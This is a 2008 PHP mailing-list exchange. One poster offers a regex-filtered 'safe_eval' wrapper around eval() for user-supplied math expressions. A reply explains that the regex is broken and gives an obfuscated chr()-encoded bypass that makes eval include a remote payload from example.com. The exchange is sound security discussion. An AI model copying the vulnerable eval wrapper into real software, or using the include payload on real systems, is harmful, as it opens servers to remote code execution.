On 10/04/2008, Jason Norwood-Young <[EMAIL PROTECTED]> wrote:
> On Thu, 2008-04-10 at 13:15 +0100, Richard Heyes wrote:
>
> > > First post to this list! I'm trying to figure out how to evaluate a
> > > string with a mathematical expression and get a result, but without
> > > using eval() as I'm accepting user input into the string. I don't just
> > > want addition, subtraction, multiplication and division - I'd like to
> > > take advantage of other functions like ceil, floor etc.
>
>
> In reply to my own question, I came up with the following function based
> on a comment on php.net
> (http://www.php.net/manual/en/function.eval.php#71045). I had a look at
> the array returned by get_defined_functions() and the maths functions
> seem mostly to be grouped (with the exception of the random number
> stuff). It works on my installation but there's nothing in the
> documentation about get_defined_functions() returning in a particular
> order - it would be safer to list each math function but I'm lazy.
>
> protected function safe_eval($s) {
> $funcs=get_defined_functions();
> $funcs=$funcs["internal"];
> $funcs=array_slice($funcs,array_search("abs",
> $funcs),array_search("rad2deg",$funcs)-array_search("abs",$funcs));
> $sfuncs="(".implode(")(",$funcs).")";
> $s=preg_replace('`([^+\-*=/\(\)\d\^<>&|\.'.$sfuncs.']*)`','',$s);
> if (empty($s)) {
> return 0;
> } else {
> try {
> eval("\$s=$s;");
> return $s;
> } catch(Exception $e) {
> return 0;
>
> }
> }
> }
That kind of thing is pretty dangerous.
In this case the regex is broken - you're putting all the function
names within the character class. That means that any character
contained within one of the allowed function names may be used in the
eval. So you can use any function that consists entirely of the
characters
abcdefghilmnopqrstuwxy01234567890_+-*=/^<>&|
which means you can include() malicious content like this:
safe_eval('include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(101).chr(120).chr(97).chr(109).chr(112).chr(108).chr(101).chr(46).chr(99).chr(111).chr(109).chr(47).chr(112).chr(97).chr(121).chr(108).chr(111).chr(97).chr(100).chr(46).chr(112).chr(104).chr(112))');
which evaluates to include('http://example.com/payload.php')
-robin
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
